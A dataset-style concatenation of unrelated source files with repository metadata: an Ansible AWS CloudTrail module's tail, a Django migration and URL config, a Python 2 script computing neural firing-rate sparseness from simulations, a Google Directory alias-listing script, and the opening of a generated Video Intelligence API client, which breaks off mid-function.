argument_spec.update(dict(state=dict(default='present', choices=['present', 'absent', 'enabled', 'disabled']), name=dict(default='default'), enable_logging=dict(default=True, type='bool'), s3_bucket_name=dict(), s3_key_prefix=dict(), sns_topic_name=dict(), is_multi_region_trail=dict(default=False, type='bool'), enable_log_file_validation=dict(default=False, type='bool', aliases=['log_file_validation_enabled']), include_global_events=dict(default=True, type='bool', aliases=['include_global_service_events']), cloudwatch_logs_role_arn=dict(), cloudwatch_logs_log_group_arn=dict(), kms_key_id=dict(), tags=dict(default={
}, type='dict')))
required_if = [('state', 'present', ['s3_bucket_name']), ('state', 'enabled', ['s3_bucket_name'])]
required_together = [('cloudwatch_logs_role_arn', 'cloudwatch_logs_log_group_arn')]
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, required_together=required_together, required_if=required_if)
if (not HAS_BOTO3):
module.fail_json(msg='boto3 is required for this module')
if (module.params['state'] in ('present', 'enabled')):
state = 'present'
elif (module.params['state'] in ('absent', 'disabled')):
state = 'absent'
tags = module.params['tags']
enable_logging = module.params['enable_logging']
ct_params = dict(Name=module.params['name'], S3BucketName=module.params['s3_bucket_name'], IncludeGlobalServiceEvents=module.params['include_global_events'], IsMultiRegionTrail=module.params['is_multi_region_trail'], EnableLogFileValidation=module.params['enable_log_file_validation'], S3KeyPrefix='', SnsTopicName='', CloudWatchLogsRoleArn='', CloudWatchLogsLogGroupArn='', KmsKeyId='')
if module.params['s3_key_prefix']:
ct_params['S3KeyPrefix'] = module.params['s3_key_prefix'].rstrip('/')
if module.params['sns_topic_name']:
ct_params['SnsTopicName'] = module.params['sns_topic_name']
if module.params['cloudwatch_logs_role_arn']:
ct_params['CloudWatchLogsRoleArn'] = module.params['cloudwatch_logs_role_arn']
if module.params['cloudwatch_logs_log_group_arn']:
ct_params['CloudWatchLogsLogGroupArn'] = module.params['cloudwatch_logs_log_group_arn']
if module.params['kms_key_id']:
ct_params['KmsKeyId'] = module.params['kms_key_id']
try:
(region, ec2_url, aws_connect_params) = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='cloudtrail', region=region, endpoint=ec2_url, **aws_connect_params)
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
results = dict(changed=False, exists=False)
trail = get_trail_facts(module, client, ct_params['Name'])
if (trail is not None):
results['exists'] = True
if ((state == 'absent') and results['exists']):
results['changed'] = True
results['exists'] = False
results['trail'] = dict()
if (not module.check_mode):
delete_trail(module, client, trail['TrailARN'])
elif ((state == 'present') and results['exists']):
do_update = False
for key in ct_params:
tkey = str(key)
if (key == 'EnableLogFileValidation'):
tkey = 'LogFileValidationEnabled'
if (ct_params.get(key) == ''):
val = None
else:
val = ct_params.get(key)
if (val != trail.get(tkey)):
do_update = True
results['changed'] = True
if module.check_mode:
trail.update({
tkey: ct_params.get(key),
})
if ((not module.check_mode) and do_update):
update_trail(module, client, ct_params)
trail = get_trail_facts(module, client, ct_params['Name'])
if (enable_logging and (not trail['IsLogging'])):
results['changed'] = True
trail['IsLogging'] = True
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and trail['IsLogging']):
results['changed'] = True
trail['IsLogging'] = False
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='stop')
tag_dry_run = False
if module.check_mode:
tag_dry_run = True
tags_changed = tag_trail(module, client, tags=tags, trail_arn=trail['TrailARN'], curr_tags=trail['tags'], dry_run=tag_dry_run)
if tags_changed:
results['changed'] = True
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
elif ((state == 'present') and (not results['exists'])):
results['changed'] = True
if (not module.check_mode):
created_trail = create_trail(module, client, ct_params)
tag_trail(module, client, tags=tags, trail_arn=created_trail['TrailARN'])
try:
status_resp = client.get_trail_status(Name=created_trail['Name'])
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
if (enable_logging and (not status_resp['IsLogging'])):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and status_resp['IsLogging']):
set_logging(module, client, name=ct_params['Name'], action='stop')
trail = get_trail_facts(module, client, ct_params['Name'])
if module.check_mode:
acct_id = '123456789012'
try:
sts_client = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_params)
acct_id = sts_client.get_caller_identity()['Account']
except ClientError:
pass
trail = dict()
trail.update(ct_params)
trail['LogFileValidationEnabled'] = ct_params['EnableLogFileValidation']
trail.pop('EnableLogFileValidation')
fake_arn = ((((('arn:aws:cloudtrail:' + region) + ':') + acct_id) + ':trail/') + ct_params['Name'])
trail['HasCustomEventSelectors'] = False
trail['HomeRegion'] = region
trail['TrailARN'] = fake_arn
trail['IsLogging'] = enable_logging
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
module.exit_json(**results)
|
[
"[email protected]"
] | |
52cfaa859b7fc79c6e21e658da2d2c8e37299b9f
|
55942d2d44f293bc05351a7c9836eb67c9acf5f6
|
/ecommerce/user_model/migrations/0006_auto_20190201_2041.py
|
6a9dba631afd1623f9823c7a2848bc174c907b98
|
[] |
no_license
|
Maheshwari2604/ecommerce
|
92c789524b7042def9621839cfe7e83776561814
|
1f58e23adb1185dee774bd90f793e0be3d4ad53f
|
refs/heads/master
| 2020-04-18T17:48:52.480108 | 2019-02-02T08:43:10 | 2019-02-02T08:43:10 | 167,665,723 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,369 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-02-01 20:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_model', '0005_register_model_verified'),
]
operations = [
migrations.CreateModel(
name='address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=30)),
('service_area', models.CharField(max_length=100)),
('local_address', models.CharField(max_length=200)),
('pin', models.PositiveIntegerField()),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.RenameField(
model_name='register_model',
old_name='email_confirmed',
new_name='email_verified',
),
migrations.RemoveField(
model_name='register_model',
name='verified',
),
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_model.register_model'),
),
]
|
[
"[email protected]"
] | |
ff1860a752422a1a417c8f5358354a2586516dea
|
116f74ac3759a589db909136ef0bf82954ae68de
|
/analysis_codes_v2/temp_calc_sparseness_v2.py
|
6353026d3a6bff966e50d40a8470b723608386ee
|
[
"MIT"
] |
permissive
|
zqwei/LIF_Vis_model
|
741ffbc1cdb95d65af5bf46f0bfadfad7b706afa
|
16f651ac827ba5f0feb40a0e619e600f1251d009
|
refs/heads/master
| 2021-03-27T14:46:12.609442 | 2018-10-19T03:42:05 | 2018-10-19T03:42:05 | 92,066,512 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 18,434 |
py
|
import numpy as np
import pandas as pd
import cPickle as pickle
import os
import scipy.io as sio
import matplotlib
import matplotlib.pyplot as plt
matplotlib.rcParams.update({'font.size': 20})
def calc_sprns_by_range_and_plot(r_data,inds_range,sp_flag):
rshape = np.shape(r_data)
print np.shape(r_data)
if sp_flag=='pop':
sp_ind = 0
elif sp_flag=='lt':
sp_ind = 1
else:
print 'Error: unknown sparseness flag'
n_frames = rshape[sp_ind]
rates_array = r_data[inds_range,:]
r_data_sq = rates_array**2
nr = (np.sum(rates_array,sp_ind)/n_frames)**2
dr = (np.sum(r_data_sq,sp_ind)/n_frames)
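    # The quantity below is the usual sparseness index (cf. Vinje & Gallant, 2000):
    # S = (1 - <r>^2 / <r^2>) / (1 - 1/N); it is near 0 for a uniform response and
    # approaches 1 when the response is concentrated in a few bins or cells.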
S = (1 - nr/dr)/(1-(1/n_frames))
S=S[~np.isnan(S)]
if sp_ind == 1:
plt.figure()
plt.hist(S)
plt.show()
else:
plt.figure()
plt.plot(S)
plt.show()
return S[~np.isnan(S)]
def evaluate_and_plot_sparseness_by_cell_type(sim_data,r_data,sp_flag):
ctype_list = ['Scnn1a','Rorb','Nr5a1','PV1','PV2','LIF_exc','LIF_inh','all_bp_exc','all_bp_inh']
ctr = 0
fig,ax_list = plt.subplots(3,3)
for ii in range(3):
for jj in range(3):
ax = ax_list[ii,jj]
if ctr<=len(ctype_list):
ctype_str = ctype_list[ctr]
#print sim_data['cells_file']
S = calc_sprns_by_cell_type(sim_data['cells_file'],r_data,ctype_str,sp_flag)
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
if sp_flag=='lt':
mu=np.mean(S)
median = np.median(S)
sigma=np.std(S)
textstr = '$\mu=%.2f$\n$\mathrm{median}=%.2f$\n$\sigma=%.2f$'%(mu, median, sigma)
#ax.hist(S)
spr_hist, bins = np.histogram(S, bins=np.linspace(0, 1.0, 10))
ax.plot(bins[:-1], spr_hist)
ax.set_ylim((0, 8000.0))
# place a text box in upper left in axes coords
ax.text(0.25, 0.95, textstr, transform=ax.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
ax.set_title(ctype_str)
ctr = ctr+1
elif sp_flag=='pop':
mu=np.mean(S)
median = np.median(S)
sigma=np.std(S)
textstr = '$\mu=%.5f$\n$\mathrm{median}=%.5f$\n$\sigma=%.5f$'%(mu, median, sigma)
ax.plot(S)
ax.set_ylim([0.7,1])
# place a text box in upper left in axes coords
ax.text(0.25, 0.95, textstr, transform=ax.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
ax.set_title(ctype_str)
ctr = ctr+1
else:
print 'Error: unknown sparseness flag'
mng = plt.get_current_fig_manager()
mng.window.showMaximized()
plt.savefig(sim_data['f_out_spr_hist_eps'], format='eps')
plt.show()
def calc_sprns_by_cell_type(cells_file,r_data,ctype_str,sp_flag):
cells_db = pd.read_csv(cells_file, sep=' ')
rshape = np.shape(r_data)
if sp_flag=='pop':
sp_ind = 0
elif sp_flag=='lt':
sp_ind = 1
else:
print 'Error: unknown sparseness flag'
if ctype_str=='all_bp_exc':
#ct_inds = []
ct_inds_1 = np.array(np.where(cells_db['type']=='Scnn1a'))
ct_inds_2 = np.array(np.where(cells_db['type']=='Rorb'))
ct_inds_3 = np.array(np.where(cells_db['type']=='Nr5a1'))
ct_inds = np.concatenate((ct_inds_1[0],ct_inds_2[0],ct_inds_3[0]))
elif ctype_str =='all_bp_inh':
ct_inds_1 = np.array(np.where(cells_db['type']=='PV1'))
ct_inds_2 = np.array(np.where(cells_db['type']=='PV2'))
ct_inds = np.concatenate((ct_inds_1[0],ct_inds_2[0]))
else:
ct_inds = np.array(np.where(cells_db['type']==ctype_str))
ct_inds = ct_inds[0]
#print ct_inds, ctype_str
rates_array = r_data[ct_inds]
n_frames = rshape[sp_ind]
r_data_sq = rates_array**2
nr = (np.sum(rates_array,sp_ind)/n_frames)**2
dr = (np.sum(r_data_sq,sp_ind)/n_frames)
S = (1 - nr/dr)/(1-(1/n_frames))
return S[~np.isnan(S)]
def compute_fr_array_mov(cells_file, spk_f_names, f_out_r, t_start, t_stop, bin_size,ntr):
cells_db = pd.read_csv(cells_file, sep=' ')
t_bins = np.arange(t_start, t_stop, bin_size)
r_data = np.zeros( (len(cells_db.index), t_bins[:-1].size) )
t = np.array([])
gids = np.array([])
for f_name in spk_f_names:
#f_name = spk_f_names
print 'Processing file %s.' % (f_name)
data = np.genfromtxt(f_name, delimiter=' ')
if (data.size == 0):
t_tmp = np.array([])
gids_tmp = np.array([])
elif (data.size == 2):
t_tmp = np.array([data[0]])
gids_tmp = np.array([data[1]])
else:
t_tmp = data[:, 0]
gids_tmp = data[:, 1]
t = np.concatenate( (t, t_tmp) )
gids = np.concatenate( (gids, gids_tmp) )
for k_t, t_bin in enumerate(t_bins[:-1]):
print 'Computing rates in bins; working on bin %d of %d.' % (k_t, t_bins[:-1].size)
ind = np.intersect1d( np.where(t >= t_bin), np.where(t < (t_bin + bin_size)) )
t_tmp = t[ind]
gids_tmp = gids[ind]
df = pd.DataFrame( {'gid': gids_tmp, 't': t_tmp} )
df_tmp = df.groupby('gid').count() * 1000.0 / bin_size/ntr # Time is in ms and rate is in Hz.
df_tmp.columns = ['rates']
for gid in df_tmp.index:
r_data[gid, k_t] = df_tmp['rates'].loc[gid]
np.save(f_out_r, r_data)
def compute_fr_array_gratings(cells_file, spk_f_names, f_out_r, t_start, t_stop, bin_size,ntr):
cells_db = pd.read_csv(cells_file, sep=' ')
t_bins = np.arange(t_start, t_stop, bin_size)
r_data = np.zeros( (len(cells_db.index), t_bins[:-1].size) )
t = np.array([])
gids = np.array([])
for f_name in spk_f_names:
#f_name = spk_f_names
print 'Processing file %s.' % (f_name)
data = np.genfromtxt(f_name, delimiter=' ')
if (data.size == 0):
t_tmp = np.array([])
gids_tmp = np.array([])
elif (data.size == 2):
t_tmp = np.array([data[0]])
gids_tmp = np.array([data[1]])
else:
t_tmp = data[:, 0]
gids_tmp = data[:, 1]
t = np.concatenate( (t, t_tmp) )
gids = np.concatenate( (gids, gids_tmp) )
for k_t, t_bin in enumerate(t_bins[:-1]):
print 'Computing rates in bins; working on bin %d of %d.' % (k_t, t_bins[:-1].size)
ind = np.intersect1d( np.where(t >= t_bin), np.where(t < (t_bin + bin_size)) )
t_tmp = t[ind]
gids_tmp = gids[ind]
df = pd.DataFrame( {'gid': gids_tmp, 't': t_tmp} )
df_tmp = df.groupby('gid').count() * 1000.0 / bin_size/ntr # Time is in ms and rate is in Hz.
df_tmp.columns = ['rates']
for gid in df_tmp.index:
r_data[gid, k_t] = df_tmp['rates'].loc[gid]
np.save(f_out_r, r_data)
def create_nat_movie_sim_dict(base_dir,sys_name):
st_frame_list = ['1530','3600','5550']
end_frame_list = ['1680','3750','5700']
sim_dict_list = {}
for kk in range(len(st_frame_list)):
st_frame = st_frame_list[kk]
end_frame = end_frame_list[kk]
f1_str = st_frame+'_to_'+end_frame+'_'
expt_str = sys_name+'_toe'+st_frame
# Decide which simulations we are doing analysis for.
sim_dict = {}
if sys_name=='ll2':
#f2 = '_sd278/spk.dat'
f2 = '_sdlif_z101/spk.dat'
elif sys_name=='rr2':
f2 = '_sd282_cn0/spk.dat'
sim_dict[expt_str] = {'cells_file': '../../../build/'+sys_name+'.csv',
't_start': 500.0,
't_stop': 5000.0,
'bin_size':33.3,
'N_trials':10,
#'f_1': base_dir+'simulations_'+sys_name+'/natural_movies/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
'f_1': base_dir+'simulation_'+sys_name+'/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
'f_2': f2,
'f_out_r': 'LIF' + expt_str+'_r.npy',
'f_out_spr_hist_eps': 'LIF' + expt_str + 'spr_hist.eps'}
sim_dict_list[kk] = sim_dict
return sim_dict_list
def create_grating_sim_dict(base_dir,sys_name):
gc_list = ['8','38','68']
sim_dict_list = {}
for kk in range(len(gc_list)):
f1_str = gc_list[kk]
expt_str = sys_name+'grating_g'+f1_str
# Decide which simulations we are doing analysis for.
sim_dict = {}
if sys_name=='ll2':
#f2 = '_sd278/spk.dat'
f2 = '_sdlif_z101/spk.dat'
elif sys_name=='rr2':
f2 = '_sd282_cn0/spk.dat'
sim_dict[expt_str] = {'cells_file': '../../../build/'+sys_name+'.csv',
't_start': 500.0,
't_stop': 3000.0,
'bin_size':33.3,
'N_trials':10,
# 'f_1': base_dir+'simulations_'+sys_name+'/gratings/output_'+sys_name+'_g'+f1_str+'_',
'f_1': base_dir+'simulation_'+sys_name+'/output_'+sys_name+'_g'+f1_str+'_',
'f_2': f2,
'f_out_r': 'LIF' + expt_str + '_r_v2.npy',
'f_out_spr_hist_eps': 'LIF' + expt_str + 'spr_hist.eps'}
sim_dict_list[kk] = sim_dict
return sim_dict_list
def sparseness_main(input_dict,sprns_type, plot_only_flag):
for kk in range(len(input_dict)):
sim_dict = input_dict[kk]
for sim_key in sim_dict.keys():
sim_data = sim_dict[sim_key]
if plot_only_flag!=1:
spk_f_names = []
for i in xrange(sim_data['N_trials']):
spk_f_names.append('%s%d%s' % (sim_data['f_1'], i, sim_data['f_2']))
compute_fr_array_mov(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#compute_fr_array_imgs(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#compute_fr_array_gratings(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
print sim_data['f_out_r']
r_data = np.load(sim_data['f_out_r'])
evaluate_and_plot_sparseness_by_cell_type(sim_data,r_data,sprns_type)
#calc_sprns_by_range_and_plot(r_data,np.arange(0,8500,1),'lt')
if __name__ == '__main__':
#base_dir = '/data/mat/antona/network/14-simulations/9-network/'
#sys_list = ['ll2','rr2']
base_dir = '/data/mat/ZiqiangW/simulation_ll_final_syn_data_lif_z102/'
sys_list = ['ll2']
plot_only_flag = 1 #0
for ss in range(len(sys_list)):
sys_name=sys_list[ss]
nat_sim_dict = create_nat_movie_sim_dict(base_dir,sys_name)
sparseness_main(nat_sim_dict,'lt',plot_only_flag)
#grating_sim_dict = create_grating_sim_dict(base_dir,sys_name)
#sparseness_main(grating_sim_dict,'lt',plot_only_flag)
#####======================LEGACY CODE=====================================#################
# def compute_fr_array_imgs(cells_file,spk_f_names,f_out_r,t_start,t_stop,bin_size,ntr):
# cells = pd.read_csv(cells_file, sep=' ')
# #num_cells = 8500
# #cells = cells1[cells1.index<num_cells]
# N_cells = len(cells.index)
#
# pkl_path = '/data/mat/antona/network/14-simulations/6-LGN_firing_rates_and_spikes/LGN_spike_trains/output2/imseq_metadata.pkl'
# f = open(pkl_path,'rb')
# imseq = pickle.load(f)
# f.close()
#
# img_ids = imseq[0]
# img_ids.insert(0,'gray')
# all_df = np.empty((N_cells,len(img_ids),ntr),dtype=object)
#
# for i_trial in np.arange(1,ntr):#,f_name in enumerate(spk_f_names):
# f_name = spk_f_names[i_trial]
# print i_trial
# print 'Processing file %s' % (f_name)
# if (os.stat(f_name).st_size != 0):
# df_temp = pd.read_csv(f_name, header=None, sep=' ')
# df_temp.columns = ['t', 'gid']
# df= df_temp#[df_temp['gid']<num_cells]
#
# i_trial_imseq = imseq[i_trial]
# i_trial_imseq.insert(0,'gray')
# #print i_trial
# #print i_trial_imseq
# for ctr, img in enumerate(i_trial_imseq):
# imcol = img_ids.index(img)
# if (ctr == 0 and img == 'gray'):
# df1 = df[df['t']<t_start]
# df1['time_img_on'] = 0.
# df1['img_id'] = img
# else:
# df1 = df[(df['t']>=(t_start+(ctr-1)*bin_size)) & (df['t']<(t_start+(ctr)*bin_size))]
# df1['time_img_on'] = t_start+(ctr-1)*bin_size
# df1['img_id'] = img
#
# if not df1.empty:
# df2 = df1.groupby('gid')
# for cnum,group in df2:
# all_df[cnum,imcol,i_trial] = group['t'].values - group['time_img_on'].values
#
#
# r_data = np.zeros((N_cells,len(img_ids)))
# for cid in range(N_cells):
# for imid in range(len(img_ids)):
# for tr in np.arange(1,ntr):
# if all_df[cid,imid,tr] is not None:
# r_data[cid,imid]= r_data[cid,imid]+len(all_df[cid,imid,tr])*1000./bin_size/ntr
#
# #np.save(f_out_r, r_data)
#
# temp2 = np.zeros((N_cells,len(img_ids),ntr))
# for cid in range(N_cells):
# for imid in range(len(img_ids)):
# for tr in np.arange(1,ntr):
# if all_df[cid,imid,tr] is not None:
# temp2[cid,imid,tr]= len(all_df[cid,imid,tr])
# flag_orig = 0
#
# if flag_orig == 1:
# ## Original computation with binning after re-ordering nat_img sequences
# ##======================================================================
# temp1 = sio.loadmat('temp_spt_per_trial_for_exc_biophys_rr2.mat')
# spkcts_ll = temp1['spikecounts_per_cell_img']
# spkcts_per_trial_ll = temp1['spikecounts_per_cell_img_trial']
#
# temp = spkcts_ll[:,1:11]*1000./250./100.
# n1 = (np.sum(temp,1)/10.)**2
#
# temp2 = temp**2
# d1 =(np.sum(temp2,1)/10.)
#
# S = (1 - n1/d1)/(1-(1/10))
# plt.figure()
# plt.hist(S[~np.isnan(S)])
# plt.show()
# else:
# ## Start using Anton's code:
# ##===========================
#
# base_dir = '/data/mat/antona/network/14-simulations/9-network/'
# sys_name='ll2'
# # st_frame = '5550'
# # end_frame = '5700'
# # f1_str = st_frame+'_to_'+end_frame+'_'
# # expt_str = sys_name+'_toe'+st_frame
# # expt_str = sys_name+'_nat_imgs'
# expt_str = sys_name+'_nat_imgs'
#
# # Decide which simulations we are doing analysis for.
# sim_dict = {}
#
# sim_dict[expt_str] = { 'cells_file': base_dir+'build/'+sys_name+'.csv',
# 't_start': 500.0,
# 't_stop': 5000.0,
# 'bin_size':33.3,
# 'N_trials':10,
# 'f_1': base_dir+'simulations_'+sys_name+'/natural_movies/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
# 'f_2': '_sd278/spk.dat',
# 'f_out_r': expt_str+'_r.npy',
# 'f_out_av': 'sparseness/'+expt_str+'_av.csv' }
#
# # sim_dict[expt_str] = { 'cells_file': base_dir+'build/'+sys_name+'.csv',
# # 't_start': 500.0,
# # 't_stop': 3250.0,
# # 'bin_size':250.,
# # 'N_trials':100,
# # 'f_1': base_dir+'simulations_'+sys_name+'/natural_images/output_'+sys_name+'_imseq_',
# # 'f_2': '_0_sd282_cn0/spk.dat',
# # 'f_out_r': expt_str+'_r_Aug6_2016.npy',
# # 'f_out_av': expt_str+'_av.csv' }
#
# # Process the data and obtain arrays of responses for each neuron within each time bin, averaged over trials.
# for sim_key in sim_dict.keys():
# sim_data = sim_dict[sim_key]
# spk_f_names = []
# for i in xrange(sim_data['N_trials']):
# spk_f_names.append('%s%d%s' % (sim_data['f_1'], i, sim_data['f_2']))
# compute_fr_array_mov(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
# compute_fr_array_imgs(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#
# print sim_data['f_out_r']
# r_data = np.load(sim_data['f_out_r'])
# r_data = r_data[:,1:]
# evaluate_and_plot_sparseness_by_cell_type(r_data,'pop')
# #calc_sprns_by_range_and_plot(r_data,np.arange(0,8500,1),'lt')
#
|
[
"[email protected]"
] | |
c701a8e3e3a9cf17b6caf71b1a833ea08ac13ec6
|
12cf1b968423f8148db853b89d869a7b44f52d3d
|
/time_display_project/urls.py
|
fb0851719ba1ce88c7ad6bdc2513637a2cb2e3c6
|
[] |
no_license
|
raqueloropeza/CodingDojo_Django_TimeDisplay
|
6cae35abcb512c222c0552992fd58d5742f75923
|
eb9c169e3352d946ddb7c728a1ee024e41ef14ad
|
refs/heads/master
| 2023-05-26T02:04:20.107681 | 2021-05-31T02:42:29 | 2021-05-31T02:42:29 | 372,362,246 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 750 |
py
|
"""time_display_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
urlpatterns = [
path('', include('app_time_display.urls')),
]
|
[
"[email protected]"
] | |
19262e47b10b332431050c327993066170f36ffe
|
763ca657487d349e57fb2e2753c9ee6d930043e8
|
/djusagi/bin/aliases.py
|
63d8d9092ccc59747a22d73e664755a6b871cf15
|
[
"MIT"
] |
permissive
|
carthage-college/django-djusagi
|
b680728ab292ab427e9b95fbb8f8a8de232a6809
|
ff890b270a9d21b9130068d69df680e5cf5e04ee
|
refs/heads/master
| 2023-04-07T09:13:08.719663 | 2023-03-28T14:08:43 | 2023-03-28T14:08:43 | 41,050,821 | 0 | 0 |
MIT
| 2023-03-13T21:42:05 | 2015-08-19T17:57:56 |
Python
|
UTF-8
|
Python
| false | false | 2,244 |
py
|
# -*- coding: utf-8 -*-
import sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
from django.conf import settings
from djusagi.core.utils import get_cred
from googleapiclient.discovery import build
import argparse
import httplib2
"""
Fetch all users from the Google API for a given domain
and check for aliases
"""
# set up command-line options
desc = """
Obtain all aliases from all users in the domain
"""
EMAIL = settings.DOMAIN_SUPER_USER_EMAIL
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"--test",
action='store_true',
help="Dry run?",
dest="test"
)
def main():
"""
main function
"""
credentials = get_cred(EMAIL, "admin.directory.user")
http = httplib2.Http()
service = build(
"admin", "directory_v1", http=credentials.authorize(http)
)
user_list = []
page_token = None
while True:
results = service.users().list(
domain=EMAIL.split('@')[1],
maxResults=100,
pageToken=page_token,
orderBy='familyName', viewType='domain_public'
).execute(num_retries=10)
for r in results["users"]:
user_list.append(r)
page_token = results.get('nextPageToken')
if not page_token:
break
for user in user_list:
pmail = user.get('primaryEmail')
if pmail:
aliases = service.users().aliases().list(userKey=pmail).execute(
num_retries=10
)
if aliases and aliases.get('aliases'):
for alias in aliases.get('aliases'):
if alias.get('alias'):
print('{}|{}|{}|{}'.format(
user.get('name').get('familyName'),
user.get('name').get('givenName'),
user.get('primaryEmail'), alias.get('alias')
))
######################
# shell command line
######################
if __name__ == "__main__":
args = parser.parse_args()
test = args.test
if test:
print(args)
sys.exit(main())
|
[
"[email protected]"
] | |
fead5db3c50b8e60ef68293d4b6165eb4a5f9806
|
6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386
|
/google/cloud/videointelligence/v1p3beta1/videointelligence-v1p3beta1-py/google/cloud/videointelligence_v1p3beta1/services/streaming_video_intelligence_service/client.py
|
5801df7ba2beb8459ff6617c5eb39f8ae345ec5a
|
[
"Apache-2.0"
] |
permissive
|
oltoco/googleapis-gen
|
bf40cfad61b4217aca07068bd4922a86e3bbd2d5
|
00ca50bdde80906d6f62314ef4f7630b8cdb6e15
|
refs/heads/master
| 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 17,380 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Iterable, Iterator, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.videointelligence_v1p3beta1.types import video_intelligence
from google.rpc import status_pb2 # type: ignore
from .transports.base import StreamingVideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import StreamingVideoIntelligenceServiceGrpcTransport
from .transports.grpc_asyncio import StreamingVideoIntelligenceServiceGrpcAsyncIOTransport
class StreamingVideoIntelligenceServiceClientMeta(type):
"""Metaclass for the StreamingVideoIntelligenceService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[StreamingVideoIntelligenceServiceTransport]]
_transport_registry["grpc"] = StreamingVideoIntelligenceServiceGrpcTransport
_transport_registry["grpc_asyncio"] = StreamingVideoIntelligenceServiceGrpcAsyncIOTransport
def get_transport_class(cls,
label: str = None,
) -> Type[StreamingVideoIntelligenceServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class StreamingVideoIntelligenceServiceClient(metaclass=StreamingVideoIntelligenceServiceClientMeta):
"""Service that implements streaming Video Intelligence API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
